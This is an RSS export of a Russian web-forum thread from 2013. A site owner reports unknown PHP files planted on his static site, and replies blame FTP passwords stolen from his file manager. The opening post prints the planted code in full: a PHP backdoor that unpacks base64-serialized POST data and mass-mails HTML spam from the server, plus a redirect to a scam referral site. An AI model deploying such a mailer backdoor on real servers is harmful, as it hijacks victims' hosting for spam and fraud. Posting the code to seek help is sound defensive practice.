Неизвестные php файлы нашел в корневой папке - Visavi.net
https://visavi.net/
RSS - Visavi.nethttps://visavi.net/assets/img/images/logo_small.pngRSS - Visavi.net
https://visavi.net/
[email protected] (admin)[email protected] (admin)Thu, 26 Dec 2024 16:09:16 +0300В любом FTP клиенте и IDE хранить пароли НЕЛЬЗЯ!<br>
<br>
KeepaSS! И только
https://visavi.net/topics/38857/645387
Неизвестные php файлы нашел в корневой папке Станислав КруничTue, 03 Sep 2013 20:38:56 +0400Сообщенияhttps://visavi.net/topics/38857/645387#6 однозначно!
https://visavi.net/topics/38857/645380
Неизвестные php файлы нашел в корневой папке Кевин МитникTue, 03 Sep 2013 20:30:22 +0400Сообщенияhttps://visavi.net/topics/38857/645380<a href="http://filezilla.ru/get/" target="_blank" rel="nofollow">Filezilla FTP Client</a>
https://visavi.net/topics/38857/645366
Неизвестные php файлы нашел в корневой папке ZдешнийTue, 03 Sep 2013 19:24:54 +0400Сообщенияhttps://visavi.net/topics/38857/645366Я 6 лет так хранил и было ок. Сейчас тотал командер у меня. Какой посоветуете?
https://visavi.net/topics/38857/645362
Неизвестные php файлы нашел в корневой папке ШЕДЕВРTue, 03 Sep 2013 19:18:24 +0400Сообщенияhttps://visavi.net/topics/38857/645362Не хрен хранить пароли FTP на менеджерах и вообще на компе в открытом виде. Меняй все пароли, ставь другой FTP менеджер. Проверяй комп на вирусы, например доктор вебом.
https://visavi.net/topics/38857/645359
Неизвестные php файлы нашел в корневой папке NeformatTue, 03 Sep 2013 18:56:40 +0400Сообщенияhttps://visavi.net/topics/38857/645359кстати. заметил что такое на ВСЕХ сайтах моих. и не важно в каких это хостингах. может на компе вирус и он подбирал пароли через тотал командер<br>
<br>
2, проверяю. каждый день. у меня касперский активен с лицензией. он даже не пикнул.
https://visavi.net/topics/38857/645357
Неизвестные php файлы нашел в корневой папке ШЕДЕВРTue, 03 Sep 2013 18:25:58 +0400Сообщенияhttps://visavi.net/topics/38857/645357комп на вирусы проверь. была подобная ситуация.только в каждый индекс добавлялся код.
https://visavi.net/topics/38857/645356
Неизвестные php файлы нашел в корневой папке николайTue, 03 Sep 2013 18:20:49 +0400Сообщенияhttps://visavi.net/topics/38857/645356Имеется простой статичный сайт из 1 страницы HTML. Никаких входящих данных. Это просто статичная страница. Недавно зашел залить внутрь сервера пару файлов. Заметил 5 файлов, неизвестного происхождения:<br>
<br>
ddubvmr.php<br>
hqdlahg.php<br>
shemubb.php<br>
yhfrhqn.php<br>
yxbmjpw.php<br>
<br>
Контент в них одинаковый. Либо в одном из них данный код:<br>
<br>
<pre class="prettyprint">
<?php
if (isset($_POST['task']))
{
error_reporting(E_ALL);
ini_set('display_errors', TRUE);
ini_set('memory_limit', '512M');
set_time_limit(0);
ini_set('max_execution_time',0);
ini_set('set_time_limit',0);
$x = unserialize(base64_decode($_POST['task']));
if ($x==false) {exit();}
$send_from = base64_encode('http://'.$_SERVER['HTTP_HOST'].$_SERVER['REQUEST_URI']);
foreach ($x as $arr)
{
echo $arr['to']."\r\n";
$arr['msg'] = str_replace('[send_from_url]',$send_from,$arr['msg']);
mail($arr['to'],$arr['subj'],$arr['msg'],"MIME-Version: 1.0\r\nContent-type: text/html; charset=windows-1251\r\n");
}
exit('SEND OK');
}
</pre>
<br>
Либо этот локатор:<br>
<pre class="prettyprint">
<?php
header('Location: http://moneevdi.ru/');
?>
</pre>
<br>
Не понятно ЧТО ЭТО и ОТКУДА ЭТО.<br>
<br>
Хостер ничего не знает. Видимо чтобы отделаться сказал, что НА САЙТЕ "ДЫРКА"... Но блин сайт статичный из 1-го файла.<br>
<br>
Что думаете, может кто либо сталкивался с этим?<br>
<br>
<em><span style="font-size:x-small">Добавлено через 02:28 сек.</span></em><br>
Как я понял это какой-то вирус, который использует сайт для отправки спама?<br>
<br>
<em><span style="font-size:x-small">Добавлено через 03:24 сек.</span></em><br>
Перейдя по сайту header('Location: <a href="http://moneevdi.ru/'" target="_blank" rel="nofollow">http://moneevdi.ru/'</a>); понял что это какой то развод, сайт-обманка... но как их файлы проникли в мой сервер?<br>
<br>
<em><span style="font-size:x-small">Добавлено через 05:51 сек.</span></em><br>
В итоге вышел на сайт <a href="http://www.utrader.com/OpenAccount/?campaign=726" target="_blank" rel="nofollow">http://www.utrader.com/OpenAccount/?campaign=726</a> .... видимо это просто реферал для получения %... но как найти ту "дыру" по которой забросили этот файл.<br>
<br>
могли ли весь хостинг взломать? то есть не через мой сайт, а через соседний, после чего закинули такой файл всем тем у кого есть активные сайты
https://visavi.net/topics/38857/645355
Неизвестные php файлы нашел в корневой папке ШЕДЕВРTue, 03 Sep 2013 18:04:18 +0400Сообщенияhttps://visavi.net/topics/38857/645355